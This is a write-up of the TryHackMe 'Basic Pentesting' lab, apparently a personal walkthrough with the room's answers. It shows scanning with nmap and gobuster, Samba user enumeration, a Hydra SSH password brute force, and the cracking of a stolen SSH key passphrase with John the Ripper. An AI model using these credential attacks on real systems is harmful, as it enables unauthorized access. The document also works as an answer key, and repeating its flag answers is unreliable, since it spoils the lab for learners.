TryHackMe Basic Pentesting





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IP Addresses:

Target/Victim Machine

```
10.10.109.136 (Ubuntu 16.04)
```

Attacker Machine

```
10.17.35.203 (Ubuntu 23.10)
```

Reconnaissance:

Nmap Scan

nmap 10.10.109.136 -o nmap.log

```
PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2

80/tcp open http Apache httpd 2.4.18

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

8080/tcp open http Apache Tomcat 9.0.7
```

Gobuster Scan

gobuster dir -u 10.10.109.136 -w /usr/share/wordlists/dirb/common.txt -o gobuster.log

```
/.htaccess (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/.htpasswd (Status: 403) [Size: 297]
/development (Status: 301) [Size: 320]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 301]
```

THM Questions:

Q1: What is the name of the hidden directory on the web server(enter name without /)?
 A: development

Enumeration and Bruteforcing:

• Enum4linux scan

enum4linux -a 10.10.109.136 | tee enum4linux.log

```
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
```

• Using Hydra to enumerate jan's password

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.109.136 | tee hydra.log

```
[22][ssh] host: 10.10.109.136 login: jan password: armando
```

THM Questions:

• *Q2*: What is the username?

A: jan

• Q3: What is the password?

A: armando

Attempting login (user: jan)

ssh jan@10.10.99.188

Login successful

THM Questions:

- Q4: What service do you use to access the server(answer in abbreviation in all caps)?
 - A: SSH
- Q5: What is the name of the other user you found(all lower case)?

A: kay

Finding PrivEsc vectors:

• linPEAS.sh scan

Found user kay's id_rsa readable by user jan (logged in via ssh) in /home/kay/.ssh/

Attempting login (user: kay)

ssh -i kay_id_rsa kay@10.10.99.188

Login unsuccessful. id_rsa encrypted.

Bruteforcing SSH key:

- Attempting id_rsa decryption using JohnTheRipper
 - python3 /opt/john/run/ssh2john.py kay_id_rsa > ssh2john.txt
 - /opt/john/run/john ssh2john.txt --wordlist=/opt/wordlists/rockyou.txt

beeswax (kay_id_rsa)

Attempting login (user: kay) (passphrase: beeswax)

ssh -i kay_id_rsa kay@10.10.99.188

Login successful.

Final Password

cat /home/kay/pass.bak

here sare ally strong password that follows the password policy \$\$

THM Questions:

Q6: What is the final password you obtain?
 A: heresareallystrongpasswordthatfollowsthepasswordpolicy\$\$

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